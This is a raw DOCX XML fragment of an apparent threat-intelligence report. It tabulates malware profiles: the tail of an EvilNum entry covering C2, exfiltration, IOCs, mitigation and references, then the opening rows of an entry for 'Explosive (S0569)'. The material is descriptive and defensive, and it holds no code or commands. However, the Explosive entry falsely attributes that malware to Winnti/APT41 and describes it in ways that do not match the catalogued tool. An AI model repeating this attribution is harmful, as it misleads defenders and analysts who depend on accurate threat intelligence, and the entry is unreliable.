            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48C522A0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Communicates with attacker-controlled servers using HTTP/HTTPS web protocols for tasking, payload delivery, and stolen data transmission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0818E403" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78957C1C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C72666" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltrates collected financial information, credentials, browser data, and system information over encrypted C2 channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0C55F533" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DEFE91C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CE9C7B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enables financial espionage, theft of sensitive business and customer data, unauthorized remote access, and long-term surveillance of targeted organizations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2B04840B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58AC6930" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694C3119" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious scheduled tasks, malicious JavaScript/VBS scripts, unusual outbound HTTPS traffic, registry persistence entries, browser data access activity, and unexpected execution of scripting engines such as wscript.exe or cscript.exe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5C3D8AB8" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="674A6C6A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2E1738" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitor script interpreter activity, detect phishing attempts, enable EDR monitoring, restrict macro execution, inspect outbound HTTPS traffic, apply least privilege, use email filtering, and monitor persistence mechanisms such as registry run keys and scheduled tasks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3C427A62" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FFFAAB5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E44B0E1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK EvilNum S0568</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve">ESET </w:t>
              </w:r>
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Evilnum</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId51" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Proofpoint Threat Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId52" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Cybereason Threat Analysis</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EB672F0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A00A29" w14:textId="33173E15" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Explosive </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0569</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6"/>
        <w:gridCol w:w="8922"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="42B01C0F" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB6C4F9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60AF5DD8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="062BD2AF" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79313733" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701F91DE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Explosive (S0569)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Downloader / Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6AED5A65" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A3E3FBE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21203065" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Explosive is malware associated with the Chinese threat group </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Winnti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/APT41. It is used as a downloader and backdoor to deploy additional payloads, execute remote commands, and maintain persistent access to compromised systems. The malware has been observed in espionage and supply-chain intrusion campaigns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="1F8EC930" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB1CE60" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7647121D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Winnti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> Group, APT41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4AC84FEE" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43C90A95" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A7CF4C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5F5A4DD9" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
